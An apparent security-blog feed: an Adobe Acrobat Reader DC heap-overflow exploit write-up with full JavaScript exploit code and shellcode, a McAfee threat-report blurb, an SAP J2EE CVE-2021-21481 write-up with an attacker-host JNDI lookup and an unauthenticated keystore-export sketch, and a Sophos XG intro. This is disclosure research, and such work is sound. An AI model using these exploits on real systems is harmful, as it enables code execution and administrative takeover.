It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.
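
To make the size mismatch tangible, here is a small back-of-the-envelope sketch. The two lengths are illustrative placeholders loosely modelled on the allocation sizes used later in the exploit, not exact values taken from it.

public class OverflowMath {
    public static void main(String[] args) {
        int baseUrlBytes = 0x200;   // illustrative byte length of the Unicode base URL
        int relUrlBytes  = 0x2400;  // illustrative byte length of the ANSI relative URL

        // The destination buffer is sized for base + relative + terminator...
        int allocated = baseUrlBytes + relUrlBytes + 1;
        // ...but the copy loop writes two bytes per ANSI character of the relative URL.
        int written   = baseUrlBytes + 2 * relUrlBytes;

        System.out.println("allocated: 0x" + Integer.toHexString(allocated));
        System.out.println("written:   0x" + Integer.toHexString(written));
        System.out.println("overflow:  0x" + Integer.toHexString(written - allocated) + " bytes");
    }
}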

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from the Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced).
  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property will have been corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows reading from and writing to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

The purpose of these allocations is to have a controllable memory region at the address where the stack is relocated after the execution of the stack pivot. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page where the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, in the hijackEIP function the getProperty function pointer of a DataView object under our control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed, which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

McAfee Labs Report Highlights Ransomware Threats

24 June 2021 at 04:01

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: June 2021.

In this edition we introduce additional context into the biggest stories dominating the year thus far, including recent ransomware attacks. While the topic itself is not new, there is no question that the threat is now truly mainstream.

This Threats Report provides a deep dive into ransomware, in particular DarkSide, which resulted in an agenda item in talks between U.S. President Biden and Russian President Putin. While we have no intention of detailing the political landscape, we certainly do have to acknowledge that this is a threat disrupting our critical services. Furthermore, adversaries are supported within an environment that makes digital investigations challenging, with legal barriers that make the gathering of digital evidence from certain geographies almost impossible.

That being said, we can assure the reader that all of the recent campaigns are incorporated into our products, and of course can be tracked within our MVISION Insights preview dashboard.

This dashboard shows that – beyond the headlines – many more countries have experienced such attacks. What it will not show is that victims are paying the ransoms, and criminals are introducing more Ransomware-as-a-Service (RaaS) schemes as a result. With the five-year anniversary of the launch of the No More Ransom initiative now upon us it’s fair to say that we need more global initiatives to help combat this threat.

Q1 2021 Threat Findings

McAfee Labs threat research during the first quarter of 2021 includes:

  • New malware samples averaging 688 new threats per minute
  • Coin Miner threats surged 117%
  • New Mirai malware variants drove increase in Internet of Things and Linux threats

Additional Q1 2021 content includes:

  • McAfee Global Threat Intelligence (GTI) queries and detections
  • Disclosed Security Incidents by Continent, Country, Industry and Vectors
  • Top MITRE ATT&CK Techniques APT/Crime

We hope you enjoy this Threats Report. Don’t forget to keep track of the latest campaigns and continuing threat coverage by visiting our McAfee Threat Center. Please stay safe.

The post McAfee Labs Report Highlights Ransomware Threats appeared first on McAfee Blog.

About the Unsuccessful Quest for a Deserialization Gadget (or: How I found CVE-2021-21481)

11 June 2021 at 10:05
This blog post describes the research on SAP J2EE Engine 7.50 I did between October 2020 and January 2021. The first part describes how I set off to find a pure SAP deserialization gadget, which would allow to leverage SAP's P4 protocol for exploitation, and how that led me, by sheer coincidence, to an entirely unrelated, yet critical vulnerability, which is outlined in part two.

The reader is assumed to be familiar with Java Deserialization and should have a basic understanding of Remote Method Invocation (RMI) in Java.

Prologue

It was in 2016 when I first started to look into the topic of Java Exploitation, or, more precisely: into exploitation of unsafe deserialization of Java objects. Because of my professional history, it made sense to have a look at an SAP product that was written in Java. Naturally, the P4 protocol of SAP NetWeaver Java caught my attention since it is an RMI-like protocol for remote administration, similar to Oracle WebLogic's T3. In May 2017, I published a blog post about an exploit that was getting RCE by using the Jdk7u21 gadget. At that point, SAP had already provided a fix long ago.

Since then, the subject has not left me alone. While there were new deserialization gadgets for Oracle's Java server product almost every month, it surprised me that no one ever heard of an SAP deserialization gadget with comparable impact. Even more so, since everybody who knows SAP software knows the vast amount of code they ship with each of their products. It seemed very improbable to me that they would be absolutely immune against the most prominent bug class in the Java world of the past six years.

In October 2020 I finally found the time and energy to set off for a new hunt. To my great disappointment, the search was in the end not successful. A gadget that yields RCE similar to the ones from the famous ysoserial project is still not in sight. However, in January, I found a completely unprotected RMI call that in the end yielded administrative access to the J2EE Engine. Besides the fact that it can be invoked through P4, it has nothing in common with the deserialization topic. Even though a mere chance find, it is still highly critical and allows compromising the security of the underlying J2EE server.

The bug was filed as CVE-2021-21481. On March 9th, 2021, SAP provided a fix. SAP note 3224022 describes the details.

P4 and JNDI

Listing 1 shows a small program that connects to a SAP J2EE server using P4. The only hint that this code has something to do with a proprietary protocol called P4 is the URL that starts with P4://. Other than that, everything is encapsulated by P4 RMI calls (for those who want to refresh their memory about JNDI). Furthermore, it is not obvious that what is going on behind the scenes has something to do with RMI. However, if you inspect more closely the types of the involved Java objects, you'll find that keysMngr is of type com.sun.proxy.$Proxy (implementing the interface KeystoreManagerWrapper) and keysMngr.getKeystore() is a plain vanilla RMI call. The argument (the name of the keystore to be instantiated) will be serialized and sent to the server, which will return a serialized keystore object (in this case it won't, because there is no keystore "whatever"). Also not obvious is that the instantiation of the InitialContext requires various RMI calls in the background, for example the instantiation of a RemoteLoginContext object that allows processing the login with the provided credentials.
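
Listing 1 itself is not reproduced here; as a rough sketch, such a client could look like the following. The initial context factory class name and the port are assumptions based on publicly documented P4/JNDI examples, not values taken from the original listing.

import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;

public class P4Client {
    public static void main(String[] args) throws Exception {
        Properties env = new Properties();
        // Factory class and port are assumptions, see the note above.
        env.put(Context.INITIAL_CONTEXT_FACTORY,
                "com.sap.engine.services.jndi.InitialContextFactoryImpl");
        env.put(Context.PROVIDER_URL, "P4://target.host:50004");
        env.put(Context.SECURITY_PRINCIPAL, "Administrator");
        env.put(Context.SECURITY_CREDENTIALS, "password");

        // Several RMI calls already happen behind the scenes here (e.g. RemoteLoginContext).
        InitialContext ctx = new InitialContext(env);

        // keysMngr is a com.sun.proxy.$Proxy implementing KeystoreManagerWrapper; the cast
        // is omitted to keep the sketch free of SAP client-side jars.
        Object keysMngr = ctx.lookup("keystore");
        // keysMngr.getKeystore("whatever") would then be a plain RMI call: the string
        // argument is serialized and sent to the server.
        System.out.println(keysMngr.getClass().getName());
    }
}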

Each of these RMI calls would in theory be a sink to send a deserialization gadget to. In the exploit I mentioned above, one of the first calls inside new InitialContext() was used to send the Jdk7u21 gadget (instead of a java.lang.String object, by the way).

Now, since the Jdk7u21 gadget is not available anymore and I was looking for a gadget consisting merely of SAP classes, I had to struggle with a very annoying limitation: The classloader segmentation. SAP J2EE knows various types of software components: interfaces, services, libraries and applications (which can consist of web applications and EJBs). When you deploy a component, you have to declare the dependencies to other components your component relies upon. Usually, web applications depend on 2-3 services and libraries which will have a couple of dependencies to other services and libraries, as well. At the bottom of this dependency chain are the core components.

Now, the limitation I was talking about is the fact that the dependency management greatly affects which classes a component can see: It can precisely see all classes of all components it relies upon (plus of course JDK classes) but not more. If your class ships as part of the keystore service above, it will only be able to resolve classes from components the keystore service declares as dependencies.

Figure 1: dependencies of the keystore service with all child and parent classloaders

This has dramatic consequences for gadget development. Suppose you found a gadget whose classes come from components X, Y and Z, but there are no dependencies between these components and, in addition, there is no component which depends on all of them. Then, no matter in which classloader context your gadget is deserialized, at least one of X, Y or Z will be missing from the classpath and the deserialization will end up in a ClassNotFoundException. By using a similar approach to the one described in the GadgetProbe project, I found out that at the point the Jdk7u21 gadget was deserialized in the above mentioned exploit, there were only about 160 non-JDK classes visible that implement java.io.Serializable. Not ideal for building an exploit.

Going back to Listing 1, in case we send a gadget instead of the string "whatever", we can tell from Figure 1 that classes from ten components (the ones listed beneath "Direct parent loaders") will be in the class path. Code that sends an arbitrary serializable object instead of the string "whatever" could e.g. look like this (instead of keysMgr.getKeystore()): if there were a gadget, one could send it with out.writeObject().

With this approach, the critical mass of accessible serializable classes can be significantly increased. The telnet interface of SAP J2EE provides useful information about the services and their dependencies.

Regardless of the classloader challenge, I was eager to get an overview of how many serializable classes existed in the server. The number of classes in the core layer, services and libraries amounts to roughly 100,000, and this does not even count application code. I quickly realized that I needed something smarter than the analysis features of Eclipse to handle such volumes. So I developed my own tool which analyses Java bytecode using the OW2 ASM Framework. It writes object and interface inheritance dependencies, methods, method calls and attributes to a SQLite DB. It turned out that out of the 100,000 classes, about 16,000 implemented java.io.Serializable. The RDBMS approach was pretty handy since it allowed building complex queries like

Give classes which are Serializable and Cloneable which implement private void readObject(java.io.ObjectInputStream) and whose toString() method exists and has more than five calls to distinct other methods

This question translates to

The work on this tool and also the process of constantly inventing new and original queries to find potentially interesting classes was great fun. Unfortunately, it was also in vain. There is a library which almost allowed building a wonderful chain from a toString() call to the ubiquitous TemplatesImpl.getOutputProperties(), but the API provided by the library is so complex and undocumented that, after two months, I gave up in total frustration. There were some more small findings which don't really deserve to be mentioned. However, I'd like to elaborate on one more thing before I start part two of the blog post, which covers the real vulnerability.

One of the first interesting classes I discovered performs a JNDI lookup with an attacker-controlled URL in private void readObject(java.io.ObjectInputStream). What would have been a direct hit four years ago could at least have been a respectable success in 2020. Remember: Oracle JRE finally switched off remote classloading when resolving LDAP references in 2019 in version JRE 1.8.0_191. Had this been exploitable, it would have opened up an attack avenue at least for systems with outdated JRE. My SAP J2EE was running on top of a JRE version 1.8.0_51 from 2015, so the JNDI injection should have worked, but, to my great surprise, it didn't.

The reason can be found in the method getObjectInstance of javax.naming.spi.DirectoryManager: the highlighted call to getObjectFactoryFromReference is where an attacker needs to get to. The method resolves the JNDI reference using a URLClassLoader and an attacker-supplied codebase. However, as one can easily see, if getObjectFactoryBuilder() returns a non-null object the code returns in either of the two branches of the following if-clause and the call to getObjectFactoryFromReference below is never reached. And that is exactly what happens. SAP J2EE registers an ObjectFactoryBuilder of type com.sap.engine.system.naming.provider.ObjectFactoryBuilderImpl. This class will try to find a factory class based on the factoryName-attribute and completely ignore the codebase-attribute of the JNDI reference.

Bottom line is that JNDI injection might never have worked in SAP J2EE, which would eliminate one of the most important attack primitives in the context of Java Deserialization attacks.
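
For reference, the general shape of such a class (a hypothetical reconstruction, not the actual SAP class I found) would be something like this:

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import javax.naming.InitialContext;

// Hypothetical shape of such a gadget class; the real SAP class is not reproduced here.
public class JndiLookupGadget implements Serializable {
    private String url;  // attacker-controlled, e.g. "ldap://attacker:1389/obj"

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        try {
            // On an old JRE, and without SAP's ObjectFactoryBuilderImpl in the way, this
            // lookup could be turned into remote class loading via an LDAP reference.
            new InitialContext().lookup(url);
        } catch (Exception ignored) {
        }
    }
}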

CVE-2021-21481

After digressing about how I searched for deserialization gadgets, I'd like to cover the real vulnerability now, which has absolutely nothing to do with Java Deserialization. It is a plain vanilla instance of CWE-749: Exposed Dangerous Method or Function. Let's go back to Listing 1. We can see that the JNDI context allows querying interfaces by name; in our example we were querying the KeyStoreManager interface by the name "keystore". On several occasions, I had already tried to find an available rich client for SAP J2EE Engine administration that uses P4. Every time I was unsuccessful, and I came to believe such a client did not officially exist, or at least was not at everyone's disposal.

However, whenever you install a SAP J2EE Engine, the P4 port is enabled by default and listens on the same network interface as the HTTP(S) services. Because I was totally focussing on Deserialization, for a long time I was oblivious to how much information one can glean through the JNDI context. E.g. it is trivial to get all bindings; the list() call allows simply iterating through them.
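
The original listing is not shown here; a sketch of that enumeration, using nothing beyond the standard JNDI API, could look like this:

import javax.naming.Context;
import javax.naming.NameClassPair;
import javax.naming.NamingEnumeration;

public class BindingDumper {
    // 'ctxt' is the InitialContext obtained over P4 as sketched earlier.
    static void dumpBindings(Context ctxt) throws Exception {
        NamingEnumeration<NameClassPair> items = ctxt.list("");
        while (items.hasMore()) {
            NameClassPair item = items.next();
            // Prints binding names such as "keystore" or "MigrationService" together
            // with the class of the bound object (proxies, _Stub classes, ...).
            System.out.println(item.getName() + " -> " + item.getClassName());
        }
    }
}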

Interesting items are proxy objects and the _Stub objects. E.g. the proxy for messaging.system.MonitorBean can be cast to com.sap.engine.messaging.app.MonitorHI.

During debugging of the server, I had already encountered the class JUpgradeIF_Stub, long before I executed the call from Listing 5. The class has a method openCfg(String path) and it was not difficult to establish that the server version of the call didn't perform any authorization check. This one definitely looked fishy to me, but since I wasn't looking for unprotected RMI calls I put the finding into the box with the label "check on a rainy Sunday afternoon when the kids are busy with someone else". But then, eventually, I did check it. It didn't take long to realize that I had found a huge problem. Compare Listing 6.

The configuration settings of the SAP J2EE Engine are organized in a hierarchical structure. The location of an object can be specified by a path, pretty much like the path of a file in the file system. The above code gets a reference to the JUpgradeIF_Stub by querying the JNDI context with the name "MigrationService", gets an instance of a Configuration object by a call to openCfg() and then walks down the path to the leaf node. The element found there can be exported to an archive that is stored in the file system of the server (call to export(String path)). If carefully chosen, the local path on the server will point to a root folder of a web application. There, download.zip can simply be downloaded through HTTP. If you want to check for yourself, the UME configuration is stored at cluster_config/system/custom_global/cfg/services/com.sap.security.core.ume.service/properties.
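
Listing 6 is not reproduced here. A hedged sketch of the flow it describes, using reflection so that no SAP client jars are needed, could look roughly like the following; only openCfg(String) and export(String) are method names taken from the analysis, everything else (the starting path, how the tree is walked down to the leaf node) is an assumption.

import java.lang.reflect.Method;
import javax.naming.Context;

public class ConfigExporter {
    static void exportConfig(Context ctxt) throws Exception {
        // The JNDI name "MigrationService" returns the JUpgradeIF_Stub (no auth check server-side).
        Object migration = ctxt.lookup("MigrationService");

        Method openCfg = migration.getClass().getMethod("openCfg", String.class);
        Object cfg = openCfg.invoke(migration, "cluster_config");  // hypothetical starting path

        // ... walk down to e.g. .../com.sap.security.core.ume.service/properties ...

        // export() writes an archive to a local path on the server; choosing a path inside a
        // web application root makes download.zip retrievable over HTTP afterwards.
        Method export = cfg.getClass().getMethod("export", String.class);
        export.invoke(cfg, "/path/inside/a/webapp/root/download.zip");
    }
}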

You'd probably say "hey! I need to be Administrator to do that! Where's the harm?". Right, I thought so, too. But neither do you need to be Administrator, nor do you even have to be authenticated: an InitialContext created without any credentials works perfectly fine (a sketch follows below), and so does the enumeration using ctxt.list() from Listing 5. The fact that authentication is not needed at this point is not new at all by the way, compare CVE-2017-5372.
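
A hedged sketch of what "works perfectly fine" means here: the same context creation as in the earlier sketch, just without any credentials (the factory class name remains an assumption).

import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;

public class UnauthenticatedContext {
    static Context connectAnonymously(String host) throws Exception {
        Properties env = new Properties();
        env.put(Context.INITIAL_CONTEXT_FACTORY,
                "com.sap.engine.services.jndi.InitialContextFactoryImpl");  // assumption, see earlier sketch
        env.put(Context.PROVIDER_URL, "P4://" + host + ":50004");
        // No SECURITY_PRINCIPAL / SECURITY_CREDENTIALS: lookups and list() still work; only
        // individual server-side methods that do have permission checks will refuse us.
        return new InitialContext(env);
    }
}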

However, you will get a permission exception when calling keysMngr.getKeystore() (because getKeystore() does have a permission check). But JUpgradeIF.openCfg() was missing the check until SAP fixed it.

At this point, even without SAP specific knowledge an attacker can cause significant harm. E.g. flood the server's file system with archives causing a resource exhaustion DoS condition.

With a little insider knowledge one can get admin access. In the configuration tree, there is a keystore called TicketKeystore. Its cryptographic key pair is used to sign SAP Logon Tickets. If you steal the keystore, you can issue a ticket for the Administrator user and log on with full admin rights. There are also various other keystores, e.g. for XML signatures and the like (let alone the fact that there is tons of stuff in this store. No one probably knows all the security sensitive things you can get access to ...)

This information should be sufficient to the understanding of CVE-2021-21481. The exact location of the keystores in the configuration and the relative local path in order to download the archive by HTTP are left as an exercise to the reader.

Sophos XG - A Tale of the Unfortunate Re-engineering of an N-Day and the Lucky Find of a 0-Day

On April 25, 2020, Sophos published a knowledge base article (KBA) 135412 which warned about a pre-authenticated SQL injection (SQLi) vulnerability, affecting the XG Firewall product line. According to Sophos this issue had been actively exploited at least since April 22, 2020. Shortly after the knowledge base article, a detailed analysis of the so called Asnarök operation was published. Whilst the KBA focused solely on the SQLi, this write up clearly indicated that the attackers had somehow extended this initial vector to achieve remote code execution (RCE).

